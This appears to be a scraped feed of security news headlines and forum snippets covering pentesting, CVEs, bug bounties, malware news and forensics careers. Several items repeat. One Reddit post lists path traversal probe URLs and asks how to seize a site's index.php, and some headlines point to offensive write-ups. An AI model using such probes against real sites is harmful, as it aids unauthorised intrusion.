    Hello, I was running hashcat until I realized that I was using my CPU and not my GPU. I have been spending a good amount of time on the internet for why my hashcat is not detecting my GPU but struggling to find an answer. I am dual booting PopOs & Kali so I am not running Kali in a VM. My GPU is a Radeon Pro WX 5100. I tested to see if my GPU is actually being used by entering sudo radeontop and ran glxgears to see if it is being picked up. Below is the results found from running sudo radeontop Graphics pipe 3.33% │ ──────────────────────────────────── Event Engine 0.00% │ Vertex Grouper + Tesselator 0.00% │ Texture Addresser 3.33% │ Shader Export 3.33% │ Sequencer Instruction Cache 0.00% │ Shader Interpolator 3.33% │ Scan Converter 3.33% │ Primitive Assembly 0.00% │ Depth Block 3.33% │…
    creating a pentest network on Virtualbox
    I have a windows server VM and a Kali linux Vm on Virtualbox , the windows server has an FTP server which I will try to hack into . Should I use an internal network on the both vms or use NAT on the VMS and set up DHCP on windows server and then connect both VMS to that . I want to make sure that both vms are on a network that is isolated from my home network so I can run NMAP and use metasploit etc . I had used the internal network but the vms would not get internet access and I was not sure why ? any help will much appreciated . submitted by /u/ghostexploitelite [link] [comments]
    Recommended Emulator for Android Application Pentesting ?
    What is your favourite Emulator for pentesting Android applications ? Which proxy (ZAP, Burp, etc.) would you recommend for intercepting traffic ? submitted by /u/aim4r [link] [comments]
  • Open

    What data can teach us about Russian propaganda
    Looking at state news agencies’ reporting on the war shows how propaganda works in a novel way. Continue reading on Medium »
    FBI Reveals Buffalo Mass Shooter Influenced by “Sandman.” Who the hell is that?
    Who platforms those indoctrinating America’s male youth to commit mass murder? Continue reading on Medium »
    My Email Investigation Toolkit
    Verification tools (SMTP, WHOIS, Headers) Email tracking, logging and geolocation Phishing email, permutation Identification email user… Continue reading on Medium »
    Searching for The White City — OSINT Challenge 23
    @Sector035 shared a new OSINT quiz with us. The objective was simple. We had to figure out where… Continue reading on Medium »
    They’re better than you at Google Maps
    I didn’t know you could use the app like this. Continue reading on Medium »
  • Open

    Domain Escalation: Unconstrained Delegation
    Introduction Post-Windows 2000, Microsoft introduced an option where users could authenticate to one system via Kerberos and work with another system. This was made possible The post Domain Escalation: Unconstrained Delegation appeared first on Hacking Articles.
  • Open

    Domain Escalation: Unconstrained Delegation
    Introduction Post-Windows 2000, Microsoft introduced an option where users could authenticate to one system via Kerberos and work with another system. This was made possible The post Domain Escalation: Unconstrained Delegation appeared first on Hacking Articles.
  • Open

    Step by step guide of setting up SSL/TLS for a server and client
    submitted by /u/Hakky54 [link] [comments]
    Building a Threat Intelligence Feed using the Twitter API and a bit of code
    submitted by /u/Robbedoes_ [link] [comments]
    Understanding CVE-2022-22972 (VMWare Workspace One Access Auth Bypass)
    submitted by /u/Mempodipper [link] [comments]
    How to secure Kubernetes Deployment
    submitted by /u/antfigunio [link] [comments]
    Rikkei Finance Hack: Explained
    submitted by /u/viagumowl [link] [comments]
  • Open

    CVE-2022-28738: Double free in Regexp compilation
    Internet Bug Bounty disclosed a bug submitted by piao: https://hackerone.com/reports/1549636 - Bounty: $4000
  • Open

    Window Registry Forensics Cheatsheet
    submitted by /u/saqfi [link] [comments]
    Master and phd or my job
    I have got grant master and phd degree in USA in cybersecurity, I already have a kind a good job right now, should i take the grant or stay in my job. ** I cant do both. submitted by /u/1328262 [link] [comments]
  • Open

    My First Bounty Reward For low hanging fruit
    Hello Guys, I am Sanath Vyas R working as Web Penetration Tester & Trainer in RVR Security Solutions. Continue reading on Medium »
    WardenSwap is partnering up with Valix Consulting to strengthen the security support
    On the 14th of March, WardenSwap has to launch a Bug Bounty Program with a reward of up to $100,000 USD on Immunefi. Continue reading on WARDEN Official »
  • Open

    SecWiki News 2022-05-28 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-28 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Empire Breakout靶机渗透
    挺简单的一个靶机,没有太多的难点,考验的还是思路和仔细认真!
    《网络安全标准实践指南—Windows 7操作系统安全加固指引》之安全配置加固的安全审计(三)
    本文根据实践指南内容,从实际出发对windows 7操作系统安全配置加固的安全审计进行实际加固作业。
  • Open

    How to download a full folder from a website that uses Workers.dev?
    Guys, I've being trying to download courses from this website https://medvideos.su/cursos-gratuitos As you can see, It opens folders full os links, that needs to be clicked one by one... I've tried to use Link extraction + Mass downloader extensions, but it simply does not get the links needed. submitted by /u/jopelira [link] [comments]
    Around 1.4+ TB of data. (Mostly chinese)
    https://od.lezi.me/ ​ Few folders had NSFW too. submitted by /u/sematrades [link] [comments]

  • Open

    Questions about the field!
    Hello r/computerforensics! I am fresh in the IT field and have an Associates degree in Network Security and Computer Forensics! I am in the position to work towards my Bachelors utilizing my new jobs professional development program and I just have a few questions. I live in a rural area but want to pursue this field. I don’t have the ability (due to certain life choices) to move very far. I would like to know the capability to work remote in this field. I have 4 options for a focus in a degree. While 2 interest me, I’d love to hear from people in the field. The focus areas: 1. General (cloud/mobile security, security monitoring/incident response) 2. Cyber Forensics 3. Information Assurance 4. Cybersecurity Analyst. Final question! Do you find that this field is rewarding? Income doesn’t so much matter, I’m already well above what the average of my state is. I suppose that I just want to know if this field is worth it over a general CIS degree. Thanks for anyone who is willing to answer in any capacity! Have a great weekend! submitted by /u/GullibleSquid [link] [comments]
  • Open

    Whoa now, hold up — CRTP
    Wait a minute, hold up. Can I do that with PowerShell? Continue reading on Medium »
    HackMyVM — Djinn
    Writeup (Español) Continue reading on Medium »
    Azure Container Instance Distributed Operations
    Azure Container Instances Distributed Operations (acido CLI) for Red Team Operations through Azure Cloud. Continue reading on Medium »
  • Open

    Opticon USA technical documents and software
    submitted by /u/j4eo [link] [comments]
    large directory of audio files + video files
    https://www.mboxdrive.com/ you can upload your own too: https://mailboxdrive.com/upload/ submitted by /u/SinisterYT06 [link] [comments]
  • Open

    Serious Dos Vulnerability
    Article URL: https://www.theoreticalstructures.io/2022/05/27/the-unbearable-lightness-of-web-vulnerabilities/ Comments URL: https://news.ycombinator.com/item?id=31533658 Points: 2 # Comments: 0
  • Open

    War in Ukraine / May 26
    Russia is not ready for negotiations Continue reading on Medium »
    A new Coordinate System — OSINT Challenge 22
    After a very long break from my blogs I’m back with a standard Quiztime. Shared by contributor @kollege. The objective was simple. We had… Continue reading on Medium »
    My Photo Investigation Toolkit
    Search by photo Extracting metadata Photoforensic tools Fact-checking tools Continue reading on Medium »
  • Open

    Can an IP Address be taken from you?
    No one technically owns their allotted IP addresses, right? Are there different parts of the custody chain that could act against an IP address "owner"? Like DNS, ultimately ICANN is the authority and then a domain registrar serves as a middleman. Two levels of authority that can act against your "ownership" of a domain. submitted by /u/navinpr0 [link] [comments]
    How to take control of the index.php file to modify the page using Traversal and IDOR?
    Hello, I've tried with: http://example.com/index.php?file=view.php http://example.com/index.php?file=index.php http://example.com/index.php?file=../index.php http://example.com/index.php?file=..\index.php ​ Can I have some guidance? ​ Thanks submitted by /u/Traditional_Bird_877 [link] [comments]
  • Open

    GhostTouch: Targeted Attacks on Touchscreens without Physical Touch (pdf, paper)
    submitted by /u/buybank [link] [comments]
    AWS universal rate-limiter bypass
    submitted by /u/thyphoous [link] [comments]
    How Defenders Can Hunt for Malicious JScript Executions
    submitted by /u/Wietze- [link] [comments]
    npm security update: Attack campaign using stolen OAuth tokens
    submitted by /u/mstromich [link] [comments]
  • Open

    SecWiki News 2022-05-27 Review
    Ghostrings is a collection of Ghidra scripts for recovering string definitions i by BaCde IEEE S&P 2022 云端报道(4) by ourren MANDIANT 网络威胁情报分析人员核心能力框架 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-27 Review
    Ghostrings is a collection of Ghidra scripts for recovering string definitions i by BaCde IEEE S&P 2022 云端报道(4) by ourren MANDIANT 网络威胁情报分析人员核心能力框架 by Avenger 更多最新文章,请访问SecWiki
  • Open

    How to Report Buggs and claim your bounty?
    Steps: Continue reading on SageMaster »
    python hash table Data Structures & Algorithms Python3
    Code : Continue reading on Medium »
  • Open

    FreeBuf周报 | VMware被半导体巨头博通收购;新型Zoom漏洞出现
    半导体巨头博通610亿美元收购虚拟机巨头、云计算公司VMware。
    CHAOS勒索病毒分析
    Chaos 是 2021 年开发的一种新的勒索软件, Chaos是一种仍在开发中的勒索软件,在地下黑客论坛上提供,在地下黑客论坛上提供,在那里它被宣传为Ryuk的新版本。
    【安全科普】今天你被社工了吗?
    内附19条防社工秘籍
    2021 Owasp top 10 逐个击破--A03:2021 – Injection
    Owasp top 10 最新排名最新的2021 top 10已经出来了,我们从A01开始进行一次详细解读,本系列会详细介绍各个漏洞的变化与内容,并会着重介绍新增的漏洞情况。A03:2021–注射因素
    RSAC 2022举办在即,创新沙盒大赛谁将成最大赢家?
    2022年6月6日,RSAC 2022创新沙盒大赛积极举办,哪家企业能够成为最后赢家,哪条赛道又将迎来新一轮的火热?
    新暗网市场Industrial Spy或已加入勒索软件攻击大军
    近日,有观察发现,新暗网市场Industrial Spy正在对受害者设备进行加密并尝试推出自己的勒索计划。
    谷歌关闭了两家俄罗斯ISP的缓存服务器
    两家俄罗斯互联网服务提供商(ISP)收到Google的通知,称其网络上的全球缓存服务器已被禁用。
    OAS 平台受关键 RCE 和 API 访问漏洞的影响
    威胁分析专家披露 OAS 平台存在安全漏洞,漏洞可导致设备访问、拒绝服务和远程代码执行受到严重影响。
    PoC代码已公布,这个 VMware auth 高危漏洞需尽快修补
    Horizo​​n3 安全研究人员在26日发布了针对CVE-2022-22972漏洞的概念验证 (PoC) 漏洞利用和技术分析。
    Windows全局代理
    在买的一些V.P.S上做扫描的时候,有可能会触发到V.P.S厂商(搬瓦工、Vultr的都有遇到过)的安全机制(如DDoS),将我们的V.P.S停机。做好全局代理的情况下,我们就可以在自己的电脑上做些扫
  • Open

    Firewall Evasion Techniques using Nmap
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Firewall Evasion Techniques using Nmap
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Firewall Evasion Techniques using Nmap
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Control character filtering misses leading and trailing whitespace in file and folder names
    Nextcloud disclosed a bug submitted by david_h1: https://hackerone.com/reports/1402249 - Bounty: $100
    Notification implicit PendingIntent in com.nextcloud.client allows to access contacts
    Nextcloud disclosed a bug submitted by qj_test: https://hackerone.com/reports/1161401 - Bounty: $250
  • Open

    Unfixed GMP Type Confusion in PHP <= 5.6.40
    Authors: Alexey Moskvin, Daniil Sadyrin https://github.com/CFandR-github/PHP-binary-bugs/blob/main/GMP_type_conf_unserialize/GMP_type_conf_advisory.md Requirements: PHP <= 5.6.40 Compiled with: ...
    从滥用 HTTP hop by hop 请求头看 CVE-2022-1388
    作者:Y4er 原文链接:https://y4er.com/post/from-hop-by-hop-to-cve-2022-1388/ 前言 最近爆出来的bigip的CVE-2022-1388漏洞,涉及到一个知识点就是hop by hop,对这个东西没了解过,所以有了此文。 回顾CVE-2021-22986 CVE-2021-22986原理是因为apache和jetty之间的鉴权不当导致的...
  • Open

    Unfixed GMP Type Confusion in PHP <= 5.6.40
    Authors: Alexey Moskvin, Daniil Sadyrin https://github.com/CFandR-github/PHP-binary-bugs/blob/main/GMP_type_conf_unserialize/GMP_type_conf_advisory.md Requirements: PHP <= 5.6.40 Compiled with: ...
    从滥用 HTTP hop by hop 请求头看 CVE-2022-1388
    作者:Y4er 原文链接:https://y4er.com/post/from-hop-by-hop-to-cve-2022-1388/ 前言 最近爆出来的bigip的CVE-2022-1388漏洞,涉及到一个知识点就是hop by hop,对这个东西没了解过,所以有了此文。 回顾CVE-2021-22986 CVE-2021-22986原理是因为apache和jetty之间的鉴权不当导致的...
  • Open

    USB Device Redux, with Timelines
    If you ask DFIR analysts, "What is best in life?", the answer you should hear is, "...creating timelines!" After all, industry luminaries such as Andrew said, "Time is the most important thing in life, and timelines are one of the most useful tools for investigation and analysis.", and Chris said, "The timeline is the central concept of all investigative work." My previous blog post addressed USB-connected devices, but only from the perspective of Windows Event Logs. In this blog post, I wanted to include data from the Registry, incorporated in a timeline so that the various data sources could be viewed through a common lens, in a single pane of glass.  I stated by using wevtutil.exe to export current copies of the five Windows Event Logs to a central location. I then used reg.exe to do…

  • Open

    Physics related OD
    http://www.w2agz.com/Library/ submitted by /u/inoculatemedia [link] [comments]
    Movies and TV
    submitted by /u/owenthewizard [link] [comments]
    Movies-TV-Anime
    http://23.147.64.113/ submitted by /u/SeniorAlbatross [link] [comments]
  • Open

    Full read SSRF in flyte-poc-us-east4.uberinternal.com
    Uber disclosed a bug submitted by ian: https://hackerone.com/reports/1540906 - Bounty: $2000
    [Urgent] Critical Vulnerability [RCE] on vulnerable to Remote Code Execution by exploiting MS15-034, CVE-2015-1635
    U.S. Dept Of Defense disclosed a bug submitted by ashutosh7: https://hackerone.com/reports/469730
    Read Other Users Reports Through Cloning
    U.S. General Services Administration disclosed a bug submitted by hollaatm3: https://hackerone.com/reports/1505609
  • Open

    (Classical Cryptography with Python) Part 1
    Hey everyone, welcome back to my blog. Today I want to demonstrate about cryptographic concept with Python programming language. Lets kick… Continue reading on Medium »
    CVE-2022–29333 Privilege Escalation Power Director 14 — Exploiting GUI Weakness
    A little while ago I saw a video of a PoC of CVE-2022–0354 where the researcher found a vulnerability in a native application of his… Continue reading on Medium »
    WiFi Hacking | Start hacking WiFi with few simple steps ;)
    This article is divided into 2 parts basic steps required to hack a wireless network Continue reading on Medium »
  • Open

    Scan email inbox to find phishing
    Hi, I am managing 500 employees' inboxes(Microsoft). Are there any solutions that can help me scan all the inboxes daily to discover if there is any missing phishing email that sits inside someone's inbox? submitted by /u/Calm_Scene [link] [comments]
    DDoS Attacks on OT
    Hi guys, Sorry if this is not a good place for this question but I was wondering if you could recommend me some literature, articles and stuff like that regarding DDOS attacks on OT( Operational Technology)? I have to write a paper about that topic but can't find any information about it. submitted by /u/PuzzleheadedYamk [link] [comments]
    EU Control
    Hey guys, I have a question which has interested me for a few days now. This new possible directive unfortunately affects not only these nasty ones, but the entire civilian population. If the EU "chat control" would come into force, how could / would you protect yourself from it? Thank u in advance! Stay healthy submitted by /u/D3ATHB1RD [link] [comments]
    What should I do?
    Hey! HS Junior here. I am currently trying to decide on what I want to do as a career, and have narrowed it down to either Cybersecurity or Quant Finance. Would an undergrad degree in Data Science be good enough for cyber security employers, or should I do a degree in CS? Specifically, I was thinking of doing DS just in case I decide to pursue quant or risk analysis for a wall street firm instead, in which case a mathematics/DS background would fair better than a CS one. Thanks! submitted by /u/TakeTheWs [link] [comments]
    Improving penetration test reporting templates
    Hi, I'm on my way automating reporting and I was wondering if you can recommend me some examples of good and yet simple penetration test templates which include - confidentiality, responsibility, summary, scope of systems etc (the stuff before and after the vulnerabilities). I'm also looking for new layout and design ideas I would like to modernize some of the graphs and the tables I use. Will appreciate any tips, videos or sources. So far I've found TCMS - Findings Report and public-pentesting-reports in github. Thanks! submitted by /u/tryingtoworkatm [link] [comments]
    What is a cheap/easy WiFi deauth attack detection?
    Without going too big (eg set up of full blown SIEM, buying enterprise grade wifi security appliance etc), what's an easy way to detect deauth attacks. I have limited syslogs from the WAPs, but can set up a Mac/Linux/Windows with wifi card or a RPi. I only need to monitor for a limited period in the immediate term, so it's cool to set up something sub optimal and temporary if it does the job. I can follow an idiot's guide for something moderately complex, but preference is as simple as possible (eg, preconfigured RPi image or a single application with 2 steps to install and configure). In essences, I'd like something that can detect deauth frames, give me a timestamp and originating MAC, either to logs or email alert. Budget is like 8 hours labour, and 200€. submitted by /u/homelaberator [link] [comments]
  • Open

    Chrome 103 Beta: Early Navigation Hints, a Host of Completed Origin Trials, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 103 is beta as of May 26, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Early Hints for Navigation Chrome now supports the 103 Early Hints HTTP response code for navigation. (Note: the correspondence with the Chrome release number is a coincidence.) When a 103 response includes or other link headers Chromium tries to preload (and/or preconnect, prefetch) specified resources before the final response is received. This gives web developers a way to optimize core web…
  • Open

    Bug Bounty FIRE Goals
    Using bug bounty along side full-time employment is a solid means to attain FIRE. (Financial Independence/Retire Early) Continue reading on Medium »
    AlbusSec:- Penetration-List 07 Cross-Side-Request-Forgery(CSRF) — Sample
    Hi Information Security folk, I hope you are well and doing great in your life, Also I hope You liked my previous article about… Continue reading on Medium »
    Social Media Take Over = Easy Money
    If you are alive like me, you probably also enjoy the idea of easy money. Continue reading on Techiepedia »
    How an Open Redirection Leads to an Account Takeover?
    Hey folks,  I’m here to share one of my old finding. In which i found a unique way of an open redirection which leads to an account… Continue reading on InfoSec Write-ups »
    How I hacked Harvard and Cambridge | The anti-wayback method
    This blog is a continuation of my previous one. If you haven't read that, please do so to understand the entire context: Continue reading on Medium »
  • Open

    Career Advice
    Hello everyone, I've just finished uni with a Bsc Cybersecurity (United Kingdom). We've covered every domain you can think off. As you know it's the most important time for us to think about what career or domain in cybersecurity we want to specialise in. I've secured a role within OTT investigation (over the top content)/illegal streaming of content; I know it's early but I like to plan ahead for my future. However, I've worked as a tech support engineer for medical companies I didn't enjoy it one bit ( I've been through hell desk). The issue is that, the difference between these two domains are vastly different but may abstractly supplement cybersecurity or DF roles that I may get in the future, I'm quite conflicted in terms career pivoting and interests. I've also done alot of DF mainly on windows, chrome and mozilia using Autopsy and Encase processor etc. I really enjoy investigating into things. I was hoping people within DF could share some insight into what some of your duties are and I'm aware of CSAM in some of the DF roles especially within LE submitted by /u/Suspicious-Choice-92 [link] [comments]
  • Open

    Operational Methodologies of Cyber Terrorist Organization “Transparent Tribe”
    No content preview
    Penetration Testing Benefits
    No content preview
    How an Open Redirection Leads to an Account Takeover?
    No content preview
    Secure Code Review -1 | Cheat sheet For Security Vulnerability In Python — Injection Flaws
    Based on OWASP Top-10 Vulnerabilities. This time we are looking for secure coding bugs related to Injection Flaws Continue reading on InfoSec Write-ups »
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    Q. What is Core Rule Set & why it is utilized by all the cloud WAFs? A. We will try to understand more about the core rule set along with… Continue reading on InfoSec Write-ups »
    Module-3 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    1. Setting up Vulnerable Application For AWS WAF Continue reading on InfoSec Write-ups »
  • Open

    Operational Methodologies of Cyber Terrorist Organization “Transparent Tribe”
    No content preview
    Penetration Testing Benefits
    No content preview
    How an Open Redirection Leads to an Account Takeover?
    No content preview
    Secure Code Review -1 | Cheat sheet For Security Vulnerability In Python — Injection Flaws
    Based on OWASP Top-10 Vulnerabilities. This time we are looking for secure coding bugs related to Injection Flaws Continue reading on InfoSec Write-ups »
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    Q. What is Core Rule Set & why it is utilized by all the cloud WAFs? A. We will try to understand more about the core rule set along with… Continue reading on InfoSec Write-ups »
    Module-3 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    1. Setting up Vulnerable Application For AWS WAF Continue reading on InfoSec Write-ups »
  • Open

    Operational Methodologies of Cyber Terrorist Organization “Transparent Tribe”
    No content preview
    Penetration Testing Benefits
    No content preview
    How an Open Redirection Leads to an Account Takeover?
    No content preview
    Secure Code Review -1 | Cheat sheet For Security Vulnerability In Python — Injection Flaws
    Based on OWASP Top-10 Vulnerabilities. This time we are looking for secure coding bugs related to Injection Flaws Continue reading on InfoSec Write-ups »
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    Q. What is Core Rule Set & why it is utilized by all the cloud WAFs? A. We will try to understand more about the core rule set along with… Continue reading on InfoSec Write-ups »
    Module-3 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    1. Setting up Vulnerable Application For AWS WAF Continue reading on InfoSec Write-ups »
  • Open

    Codenotary Adds Background Vulnerability Scanning
    Article URL: https://thenewstack.io/codenotary-adds-background-vulnerability-scanning/ Comments URL: https://news.ycombinator.com/item?id=31522042 Points: 1 # Comments: 0
    Tell HN: Mitigate Security Vulnerability in Tails 5.0
    Mitigate Security Vulnerability in Tails 5.0 : https://tails.boum.org/security/prototype_pollution/index.en.html >We recommend that you stop using Tails until the release of 5.1 (May 31) if you use Tor Browser for sensitive information (passwords, private messages, personal information, etc.). >Security level You can change the security level of Tor Browser to disable browser features as a trade-off between security and usability. For example, you can set the security level to Safest to disable JavaScript completely. The security level is set to Standard by default which gives the most usable experience. about:config set; javascript.enabled to false javascript.options.asmjs to false Comments URL: https://news.ycombinator.com/item?id=31514412 Points: 2 # Comments: 0
  • Open

    War in Ukraine / May 25
    95% of the Luhansk region are occupied Continue reading on Medium »
    How to install anon OS Tails on USB-drive?
    Today we will learn how to install a private OS TAILS — one of the Linux distributions based on Debian with maximum security. Continue reading on Medium »
  • Open

    We Love Relaying Credentials: A Technical Guide to Relaying Credentials Everywhere
    submitted by /u/mgalloar [link] [comments]
    Fully automated threat hunting. Too good to be true?
    https://medium.com/cybersecurityspace/fully-automated-threat-hunting-too-good-to-be-true-88e39fe0f13e Can we get to a point when fully automated threat hunting is possible in the indefinite future? submitted by /u/Cultural_Budget6627 [link] [comments]
    GitHub - sailay1996/CdpSvcLPE: Windows Local Privilege Escalation via CdpSvc service (Writeable SYSTEM path Dll Hijacking)
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    SecWiki News 2022-05-26 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-26 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    FreeBuf甲方群话题讨论 | 你会给国产化安全产品机会吗?对Sohu钓鱼邮件有何看法?
    现阶段,国产化的技术、产品或服务依然面临着巨大挑战和苦难,那国产化进展到底如何?还有哪些疑难杂症有待解决?
    恶意软件构建工具 KurayStealer 浮出水面
    Uptycs 的研究人员近日发现了一个新的恶意软件构建工具 KurayStealer,被用于出售给犯罪分子使其更方便地构建恶意软件。
    Metastealer 接棒 Racoon stealer 进行窃密
    MetaStealer 是一个新出现的窃密恶意软件,该恶意软件旨在填补 2022 年 3 月份 Racoon stealer 停止运营带来的市场空白。
    FreeBuf早报 | 推特遭1.5亿美元巨额罚款 ;印度第二大航司遭勒索软件攻击
    美国联邦贸易委员会(FTC)将对推特处以 1.5 亿美元巨额罚款。
    「神剑攻防演练宝典」之“0day漏洞攻击调查”
    攻防演练中如何快速追踪异常、全面调查攻击链路?看神剑法宝“象守”的!
    成功逮捕!SilverTerrier团伙头目被尼日利亚警方控制
    尼日利亚警方于近日在拉各斯逮捕了网络犯罪团伙SilverTerrier的疑似头目。
    ChromeLoader恶意软件激增,恐将威胁全球浏览器
    相较年初以来的稳定,ChromeLoader恶意软件的数量在本月有所上升。
    因欺骗性定向广告,推特遭1.5亿美元巨额罚款
    因欺诈性广告,美国联邦贸易委员会 (FTC)将对推特处以 1.5亿美元巨额罚款。
    新型勒索软件Cheers正攻击VMware ESXi 服务器
    VMware ESXi 是全球大型组织普遍使用的虚拟化平台,因此对其进行加密勒索通常会严重破坏企业的运营。
  • Open

    How to Detect TOR Network Connections with Falco
    submitted by /u/MiguelHzBz [link] [comments]
    VMware Authentication Bypass Vulnerability (CVE-2022-22972) Technical Deep Dive and POC
    submitted by /u/scopedsecurity [link] [comments]
    Improving the ICS-OT Vulnerability Disclosure Process Between Researchers and Vendors
    submitted by /u/derp6996 [link] [comments]
    VirtualBox leaks host ring 0 SIMD registers into guest ring 3
    submitted by /u/zx2c4 [link] [comments]
  • Open

    Intro to Web App Security Testing: Burp Suite Tips & Tricks
    A brief list of useful things we wish we had known sooner Burp Suite Pro can be complicated and intimidating. Even after learning and becoming comfortable with the core functionality, there remains a great deal of depth throughout Burp Suite, and many users may not stray far from the staples they know. However, after years... The post Intro to Web App Security Testing: Burp Suite Tips & Tricks appeared first on TrustedSec.
  • Open

    Letsdefend.io EventID 116
    The alert with EventID 116 shows that Javascript code is detected in URL. Continue reading on Medium »

  • Open

    What was Bryan Neumeister talking about in the Johnny Depp defamation case?
    Can someone go into detail about what exactly Bryan Neumeister was talking about in the Johnny Depp defamation case? submitted by /u/YungTerpenzee [link] [comments]
    Book suggestions for digital forensics enthusiast
    Hello Guys, Am interested in digital forensics and wish to read some good books on it. It may be as an introduction to this domain which is easy to understand, written by a field expert and maybe fun to read but should illustrate well about the domain. Please do suggest books or post links to purchase. TIA :) submitted by /u/the_bearded_madrasi [link] [comments]
    virtual chain of custody
    Anyone have an process for virtual chain of custody? Like if I client sends you a VM or AWS snapshot. Do you record chain of custody? Curious what other groups do. submitted by /u/CrazyKitty2016 [link] [comments]
    Examiners in the field, what happens with a case and its evidence if the device is infected with malware?
    Hello all, I am a junior malware analyst/IR and am currently writing my undergraduate thesis for a B.S. in Computer Forensics. For my thesis, I am gearing towards a malware angle applied to digital forensics since those are both my passions. I have conducted extensive research, but one thing I cannot get a solid grasp on is what happens to an investigation when the examiner(s) confirm that the device is infected with malware. Does the investigation continue regardless and all pertinent evidence per the limits of the warrant is documented as normal? Or does the investigation pause and the device is handed off to a third-party to conduct professional malware analysis on the device to determine if evidence has been either generated by the malware itself or tampered with? submitted by /u/ringzero_ [link] [comments]
    Advice considering a career in computer forensics
    I currently have a bachelor's degree in computer & information technology and am currently working towards getting a master's degree in computer technology and data science. I always imagined that my degrees would lead me to a career in programming. However, I have recently learned about computer forensics and it sounds like a fun and interesting career. What sort of requirements and training are needed for a career in this field? I probably would want a job assisting police and law enforcement in investigations. What sort of salary would a job like this have, and what benefits and drawbacks would a job like this have? I have a limited knowledge of what the job market is like for this profession so any information would be nice! submitted by /u/No_Curve_3351 [link] [comments]
  • Open

    Pre-hijacked accounts (pdf, research paper)
    submitted by /u/ScottContini [link] [comments]
    Zoom RCE via "xmpp stanza smuggling"
    submitted by /u/phree_radical [link] [comments]
    RCE over ham radio - Reverse shell via WinAPRS
    submitted by /u/rickostuff [link] [comments]
    Security Code Audit - For Fun and Fails
    submitted by /u/scopedsecurity [link] [comments]
    Tetragon: case study of security product's self-protection
    submitted by /u/hardenedvault [link] [comments]
    seL4 Whitepaper released.
    submitted by /u/providerstatistics [link] [comments]
    The printer goes brrrrr!!!
    submitted by /u/0xdea [link] [comments]
    Finding Bugs in Windows Drivers, Part 1 – WDM
    submitted by /u/jat0369 [link] [comments]
  • Open

    Vulnerability In PayPal worth 200000$ bounty
    Article URL: https://medium.com/@h4x0r_dz/vulnerability-in-paypal-worth-200000-bounty-attacker-can-steal-your-balance-by-one-click-2b358c1607cc Comments URL: https://news.ycombinator.com/item?id=31510256 Points: 1 # Comments: 1
    Security Vulnerability in Tor Browser
    Article URL: https://darknetlive.com/post/psa-security-vuln-in-tor-browser/ Comments URL: https://news.ycombinator.com/item?id=31509777 Points: 187 # Comments: 94
    Serious security vulnerability in Tails 5.0
    Article URL: https://tails.boum.org/security/prototype_pollution/index.en.html Comments URL: https://news.ycombinator.com/item?id=31501499 Points: 4 # Comments: 0
  • Open

    How I made it into the United Nations hall of fame as I slept
    This article is going to be about how I got my name in the United Nations hall of fame for finding a reflected XSS bug as I slept. Continue reading on Medium »
    2fa bypass again
    Hello My Dear Buggies!!! Continue reading on Medium »
    Atlassian Jira Seraph Authentication Bypass RCE
    CVE-2022–0540 Continue reading on Medium »
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    Q. What is Core Rule Set & why it is utilized by all the cloud WAFs? A. We will try to understand more about the core rule set along with… Continue reading on InfoSec Write-ups »
    Secure Code Review -1 | Cheat sheet For Security Vulnerability In Python — Injection Flaws
    Based on OWASP Top-10 Vulnerabilities. This time we are looking for secure coding bugs related to Injection Flaws Continue reading on InfoSec Write-ups »
    My Blackhat stories- How I hacked a college and paid my friend's fees
    Intro: Continue reading on Medium »
    How I was able to hack A Panel PHP Material_Wallpaper(solodroid)&Viaviweb
    Hello everyone, I’m “the injector ”, I’m a network administrator and a bug bounty hunter, today i will show you how im hack a panel of php… Continue reading on Medium »
  • Open

    Lot of old cartoons, some spanish
    http://fina.dyndns.tv/Cartoons/ Go up a directory for other media submitted by /u/inoculatemedia [link] [comments]
    torrent RSS feeds of premium leftie podcasts
    submitted by /u/kBr9gFITLKkTVSEiQ6PJ [link] [comments]
  • Open

    Taking ESF For A(nother) Spin
    2+ years ago from the date of this blog post I wrote my initial blog post where I started becoming familiar with Apple’s Endpoint Security… Continue reading on Medium »
    Attack and Hunting Lateral Movement with Service Control Manager(SVCCTL)
    There are some lateral movement techniques that don't rely on vulnerabilities, like WMI, PsExec and Dcom. These methods require that… Continue reading on Medium »
  • Open

    War in Ukraine / May 24
    👉 The greatest air battle of the 21st Century [Expert View] Continue reading on Medium »
    Approaching CTF OSINT Challenges — Learn by Example
    New to OSINT challenges? Based on examples from the recent 2022 NahamCon CTF, I provide general recommendations on solving OSINT challenges. Continue reading on InfoSec Write-ups »
  • Open

    "vPub v5" opensource online Party! - this Thursday at 4 PM UTC
    submitted by /u/Mike-Banon1 [link] [comments]
  • Open

    Blind XSS in app.pullrequest.com/ via /reviews/ratings/{uuid}
    HackerOne disclosed a bug submitted by bugra: https://hackerone.com/reports/1558010 - Bounty: $2500
    Stored XSS in Notes (with CSP bypass for gitlab.com)
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1481207 - Bounty: $13950
    Email templates XSS by filterXSS bypass
    Judge.me disclosed a bug submitted by caue: https://hackerone.com/reports/1404804 - Bounty: $1250
  • Open

    SecWiki News 2022-05-25 Review
